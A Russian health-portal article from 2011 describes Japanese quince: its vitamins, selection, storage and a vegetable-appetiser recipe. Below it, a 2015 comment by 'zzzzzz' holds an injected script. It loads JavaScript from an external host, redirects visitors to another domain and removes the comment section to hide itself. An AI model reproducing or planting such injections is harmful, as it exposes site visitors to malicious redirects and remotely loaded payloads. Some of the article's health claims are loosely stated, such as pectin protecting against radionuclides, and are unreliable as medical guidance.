Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Японская айва. Ягода для ...  >>  Японская айва. Ягода для сосудов
 
Обратная связь
 

Японская айва. Ягода для сосудов

Размер шрифта
02 декабря 2011 07:59
  • google_analytics: false
  • Нравится

Этот «северный лимон» содержит больше витамина С, чем обычный лимон. Как выбрать, как хранить и как выжать из японской айвы максимум?

1

Японская айва и айва обычная – это абсолютно разные растения. Обычная айва растет на деревьях, как яблоки, а японская айва – на кустарниках. Цветет японская айва весной, покрываясь ярко-розовыми цветами. Плодоносит это растение через 2-3 года после посадки. Айва прекрасно переживает российские морозы. Желательно сажать кустарник в солнечном месте.


  • «Северный лимон» обладает стойким и приятным запахом, поэтому спелые плоды можно использовать как ароматизатор.
  • Из сушеных плодов можно делать отвары против болезней желудка и кишечника.
  • В японской айве много пектина, а значит, она полезна тем, кто работает на вредных производствах или живет в загрязненных радионуклидами зонах.
  • Дубильные вещества в ее составе оказывают противовоспалительное, кровоостанавливающее и закрепляющее действие.

В японской айве содержатся:


  1. Витамин C. Он способствует выработке коллагена, который необходим для эластичности кровеносных сосудов. Чем эластичнее сосуд, тем ниже риск сердечнососудистых заболеваний.

  2. Пектин. Нормализует работу кишечника.

  3. Необходимые микро- и макроэлементы: калий, кальций, магний, фосфор.

  4. Марганец. Активизирует обмен веществ.

  5. Медь. Необходима для эластичности сосудов, суставов, для нормальной работы щитовидной железы и нервной системы.

Пьедестал почета по содержанию витамина С

1. Японская айва
2. Айва
3. Яблоко

Витамин С способствует выработке коллагена, который необходим для эластичности кровеносных сосудов. Чем эластичнее сосуд, тем он здоровее, и тем меньше риск сердечнососудистых заболеваний.

Как выбрать?


  • Айва должна быть желтоватого цвета. Зеленая кожура говорит о том, что она не дозрела, а темный цвет – о переспелости.
  • Айва должна вкусно пахнуть.
  • Плоды должны быть сочными, а кожура твердой. Слишком твердые плоды – признак того, что они не дозрели.
  • Плоды с вмятинами, темными пятнами, другими дефектами брать не следует.

Как хранить


  • Желательно хранить в темном, сухом месте.
  • Если айва должна дозреть, надо хранить ее при комнатной температуре.
  • В холодильнике японская айва останется свежей на протяжении нескольких недель.
  • В морозилке японскую айву можно хранить в виде пюре. А можно очистить от кожуры, порезать, обдать лимонным соком и отправить в морозилку.

Как правильно съесть

Японская айва легко и быстро окисляется, как яблоко. И поэтому ее надо либо сразу моментально готовить, либо опустить в лимонный сок. Не передержите: сама по себе айва очень кислая.

В свежем виде как отдельное блюдо японскую айву практически не едят.

Можно сделать чай с айвой вместо лимона.

Можно сделать заготовки с айвой: пюре, повидло, варенье, сиропы, вино.

В Европе из айвы делают пасту котиньяк. В Восточной Европе, на Ближнем Востоке и Северной Африке японскую айву подают с мясом и курицей.

Рецепт овощной закуски с японской айвой

2 кг баклажанов
1 кг айвы
1 кг перца
2 кг помидоров
200 г чеснока
Маринад: (60 г соли, 150 г сахара, 100 г уксуса, 400 г растительного масла), 2 пучка петрушки, 2 пучка укропа, горький перец.

1. Баклажаны и перец нарезать.
2. Айву очистить от сердцевины и семечек. Кожицу не срезать.
3. Зелень, помидоры и чеснок мелко нарезать.
4. Сделать маринад, опустить в него овощи. Кипятить 50-60 минут.

 

Сюжеты по теме
Японская айва. Северный лимон

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы о простуде, которым пора положить конец!   Минеральная недостаточность   Минеральные вещества   Грейпфрут нельзя есть вместе с этими лекарствами!  

Слайдшоу

1
Все что нужно женщине. Часть 7 9 сладких парочек, которые спасут вас!
Как избавиться от простуды Самая низкокалорийная еда
8 продуктов для красивой и молодой кожи Что съесть, когда не спится
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.